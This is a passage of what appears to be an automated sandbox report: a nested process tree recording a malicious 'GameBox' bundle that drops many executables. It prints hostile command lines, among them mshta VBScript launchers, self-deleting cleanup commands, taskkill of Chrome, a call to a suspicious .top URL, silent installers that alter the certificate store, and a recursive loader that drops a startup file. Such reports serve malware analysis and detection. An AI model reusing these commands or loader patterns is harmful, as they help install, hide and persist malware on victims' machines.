                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-A1N4D.tmp\{app}\vdi_compiler.exe"
                                                                            10⤵
                                                                              PID:6044
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping localhost -n 4
                                                                                11⤵
                                                                                • Runs ping.exe
                                                                                PID:9180
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                            9⤵
                                                                              PID:6840
                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:8412
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Enumerates connected drives
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:5684
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372052 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                        6⤵
                                                                          PID:8340
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:5808
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O4UGU.tmp\WEATHER Manager.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O4UGU.tmp\WEATHER Manager.tmp" /SL5="$20232,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4224
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AUG68.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-AUG68.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Enumerates connected drives
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:6984
                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-AUG68.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-AUG68.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372052 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                              8⤵
                                                                                PID:9120
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Drops file in Program Files directory
                                                                          PID:4660
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:1476
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HEEVB.tmp\VPN.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HEEVB.tmp\VPN.tmp" /SL5="$20228,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:5136
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-AUG67.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-AUG67.tmp\Setup.exe" /silent /subid=720
                                                                              7⤵
                                                                                PID:6056
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-UR2J9.tmp\Setup.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UR2J9.tmp\Setup.tmp" /SL5="$302C4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-AUG67.tmp\Setup.exe" /silent /subid=720
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:6824
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                    9⤵
                                                                                      PID:8772
                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                        tapinstall.exe remove tap0901
                                                                                        10⤵
                                                                                          PID:5960
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                        9⤵
                                                                                          PID:6280
                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                            10⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Drops file in Windows directory
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Modifies system certificate store
                                                                                            PID:8360
                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                          9⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:7104
                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                          9⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:8272
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:5960
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5944
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                    6⤵
                                                                                      PID:6668
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im chrome.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:6444
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6124
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DLKUI.tmp\MediaBurner2.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-DLKUI.tmp\MediaBurner2.tmp" /SL5="$4027E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                      6⤵
                                                                                        PID:5732
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2UICE.tmp\3377047_logo_media.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2UICE.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                          7⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Drops file in Program Files directory
                                                                                          PID:6348
                                                                                          • C:\Program Files\Microsoft Office\IIULHHOEYF\ultramediaburner.exe
                                                                                            "C:\Program Files\Microsoft Office\IIULHHOEYF\ultramediaburner.exe" /VERYSILENT
                                                                                            8⤵
                                                                                              PID:2676
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RENG1.tmp\ultramediaburner.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RENG1.tmp\ultramediaburner.tmp" /SL5="$502D0,281924,62464,C:\Program Files\Microsoft Office\IIULHHOEYF\ultramediaburner.exe" /VERYSILENT
                                                                                                9⤵
                                                                                                • Drops file in Program Files directory
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:7364
                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                  10⤵
                                                                                                    PID:7464
                                                                                              • C:\Users\Admin\AppData\Local\Temp\c1-2ac70-d4b-cfeb4-6a5dc728309bf\Qowaepebewu.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\c1-2ac70-d4b-cfeb4-6a5dc728309bf\Qowaepebewu.exe"
                                                                                                8⤵
                                                                                                • Checks computer location settings
                                                                                                PID:7276
                                                                                              • C:\Users\Admin\AppData\Local\Temp\87-480da-4a8-08a86-f15adce879fb3\Goqebiwoba.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\87-480da-4a8-08a86-f15adce879fb3\Goqebiwoba.exe"
                                                                                                8⤵
                                                                                                  PID:7440
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sf32xlsk.w2a\GcleanerEU.exe /eufive & exit
                                                                                                    9⤵
                                                                                                      PID:6000
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sf32xlsk.w2a\GcleanerEU.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\sf32xlsk.w2a\GcleanerEU.exe /eufive
                                                                                                        10⤵
                                                                                                          PID:8288
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onvgjhjf.atw\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                        9⤵
                                                                                                          PID:8656
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onvgjhjf.atw\installer.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\onvgjhjf.atw\installer.exe /qn CAMPAIGN="654"
                                                                                                            10⤵
                                                                                                              PID:9008
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jehc1s5z.3gd\ufgaa.exe & exit
                                                                                                            9⤵
                                                                                                              PID:9024
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1aj42bxh.szd\anyname.exe & exit
                                                                                                              9⤵
                                                                                                                PID:5828
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1aj42bxh.szd\anyname.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1aj42bxh.szd\anyname.exe
                                                                                                                  10⤵
                                                                                                                    PID:8556
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1aj42bxh.szd\anyname.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1aj42bxh.szd\anyname.exe" -q
                                                                                                                      11⤵
                                                                                                                        PID:7548
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0zroshz.f1n\gcleaner.exe /mixfive & exit
                                                                                                                    9⤵
                                                                                                                      PID:6372
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\u0zroshz.f1n\gcleaner.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\u0zroshz.f1n\gcleaner.exe /mixfive
                                                                                                                        10⤵
                                                                                                                          PID:7604
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oyav3k4r.hfd\autosubplayer.exe /S & exit
                                                                                                                        9⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:3800
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqexwy54.4um\app.exe /8-2222 & exit
                                                                                                                        9⤵
                                                                                                                          PID:7012
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            10⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Modifies registry class
                                                                                                                            PID:5968
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xqexwy54.4um\app.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\xqexwy54.4um\app.exe /8-2222
                                                                                                                            10⤵
                                                                                                                              PID:7000
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xqexwy54.4um\app.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\xqexwy54.4um\app.exe" /8-2222
                                                                                                                                11⤵
                                                                                                                                  PID:4512
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4004
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                        6⤵
                                                                                                                          PID:5960
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5848
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpBB7C_tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\tmpBB7C_tmp.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:7124
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            "C:\Windows\System32\dllhost.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5088
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                              7⤵
                                                                                                                                PID:6100
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd
                                                                                                                                  8⤵
                                                                                                                                    PID:7500
                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                      9⤵
                                                                                                                                        PID:8072
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        Esplorarne.exe.com i
                                                                                                                                        9⤵
                                                                                                                                          PID:8036
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            10⤵
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:3196
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              11⤵
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              PID:5168
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                12⤵
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:8388
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  13⤵
                                                                                                                                                    PID:8840
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      14⤵
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:8532
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        15⤵
                                                                                                                                                          PID:8468
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            16⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:8132
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              17⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:8668
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                18⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:5928
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  19⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:8236
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    20⤵
                                                                                                                                                                      PID:8412
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:6304
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:7164
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            23⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:8728
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              24⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:8464
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                25⤵
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:8832
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                9⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:7024
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:5448
                                                                                                                                        • C:\Users\Admin\Documents\y3MjLFHEekmxFEf7w0HN5F7m.exe
                                                                                                                                          "C:\Users\Admin\Documents\y3MjLFHEekmxFEf7w0HN5F7m.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:6720
                                                                                                                                        • C:\Users\Admin\Documents\jAaIgDvktdxENbFmMHhNf9Mg.exe
                                                                                                                                          "C:\Users\Admin\Documents\jAaIgDvktdxENbFmMHhNf9Mg.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:6716
                                                                                                                                        • C:\Users\Admin\Documents\Juo6h4bLyXZzYJB5RnDecwOP.exe
                                                                                                                                          "C:\Users\Admin\Documents\Juo6h4bLyXZzYJB5RnDecwOP.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:6980
                                                                                                                                            • C:\Users\Admin\Documents\Juo6h4bLyXZzYJB5RnDecwOP.exe
                                                                                                                                              "C:\Users\Admin\Documents\Juo6h4bLyXZzYJB5RnDecwOP.exe" -q
                                                                                                                                              7⤵
                                                                                                                                                PID:7544
                                                                                                                                            • C:\Users\Admin\Documents\Rz6x1_sBzl9c3vCssbhj5WUp.exe
                                                                                                                                              "C:\Users\Admin\Documents\Rz6x1_sBzl9c3vCssbhj5WUp.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:6168
                                                                                                                                            • C:\Users\Admin\Documents\BgwjZ0VbNB81gQ2HEBg3hcIo.exe
                                                                                                                                              "C:\Users\Admin\Documents\BgwjZ0VbNB81gQ2HEBg3hcIo.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:5532
                                                                                                                                              • C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe
                                                                                                                                                "C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:6848
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                    7⤵
                                                                                                                                                      PID:7512
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\IRJqBaPWnXcgfbL1sJGIIswI.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5772
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:5732
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                            9⤵
                                                                                                                                                              PID:6888
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:6428
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:6484
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:6692
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill -f -iM "IRJqBaPWnXcgfbL1sJGIIswI.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:8084
                                                                                                                                                          • C:\Users\Admin\Documents\yEStvhhbeRneW0KlU2B3nesB.exe
                                                                                                                                                            "C:\Users\Admin\Documents\yEStvhhbeRneW0KlU2B3nesB.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:4720
                                                                                                                                                          • C:\Users\Admin\Documents\IbSApWjyfELOaAKNVySrXT40.exe
                                                                                                                                                            "C:\Users\Admin\Documents\IbSApWjyfELOaAKNVySrXT40.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:5276
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im IbSApWjyfELOaAKNVySrXT40.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\IbSApWjyfELOaAKNVySrXT40.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                              7⤵
                                                                                                                                                                PID:7880
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /im IbSApWjyfELOaAKNVySrXT40.exe /f
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:6796
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 6
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:8304
                                                                                                                                                            • C:\Users\Admin\Documents\skEshonksQssAPZ4aQDnxj8z.exe
